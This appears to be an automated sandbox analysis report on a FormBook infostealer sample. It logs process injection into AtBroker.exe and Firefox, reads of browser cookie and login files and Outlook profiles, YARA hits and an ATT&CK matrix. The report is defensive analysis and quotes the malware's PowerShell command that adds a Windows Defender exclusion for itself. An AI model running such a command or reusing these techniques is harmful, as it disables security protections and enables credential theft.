Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtClose: Direct from: 0x76EF2B6C
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtSetInformationThread: Direct from: 0x76EF2B4C	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtReadVirtualMemory: Direct from: 0x76EF2E8C	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	NtCreateKey: Direct from: 0x76EF2C6C	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe

Memory written: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe base: 400000 value starts with: 4D5A

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: NULL target: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Section loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\AtBroker.exe

Thread register set: target process: 6208

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\AtBroker.exe

Thread APC queued: target process: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe

Jump to behavior

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe"	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process created: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe"	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Process created: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe "C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe"	Jump to behavior
Source: C:\Program Files (x86)\WwenbeCbxfNhfaTvmXFIirakbCikiCPmwlEKYZHttRIRYqOGnPavAODOTPINSNK\iKfhbNmgVEQKZlbl.exe	Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: iKfhbNmgVEQKZlbl.exe, 00000009.00000000.2321707899.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, iKfhbNmgVEQKZlbl.exe, 00000009.00000002.3322537466.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, iKfhbNmgVEQKZlbl.exe, 0000000B.00000000.2480508314.0000000001301000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: iKfhbNmgVEQKZlbl.exe, 00000009.00000000.2321707899.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, iKfhbNmgVEQKZlbl.exe, 00000009.00000002.3322537466.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, iKfhbNmgVEQKZlbl.exe, 0000000B.00000000.2480508314.0000000001301000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: iKfhbNmgVEQKZlbl.exe, 00000009.00000000.2321707899.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, iKfhbNmgVEQKZlbl.exe, 00000009.00000002.3322537466.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, iKfhbNmgVEQKZlbl.exe, 0000000B.00000000.2480508314.0000000001301000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: iKfhbNmgVEQKZlbl.exe, 00000009.00000000.2321707899.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, iKfhbNmgVEQKZlbl.exe, 00000009.00000002.3322537466.00000000019D1000.00000002.00000001.00040000.00000000.sdmp, iKfhbNmgVEQKZlbl.exe, 0000000B.00000000.2480508314.0000000001301000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Queries volume information: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\qxXd7JaCvGdKUp8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 6.2.qxXd7JaCvGdKUp8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.qxXd7JaCvGdKUp8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3323139781.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3324905749.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2400453269.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3322974349.0000000003BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2401086517.0000000001160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2402429418.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3322856806.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3321297429.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\AtBroker.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 6.2.qxXd7JaCvGdKUp8.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.qxXd7JaCvGdKUp8.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.3323139781.00000000042E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3324905749.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2400453269.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.3322974349.0000000003BB0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2401086517.0000000001160000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2402429418.0000000002030000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3322856806.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3321297429.00000000004B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	412 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	412 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report qxXd7JaCvGdKUp8.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
qxXd7JaCvGdKUp8.exe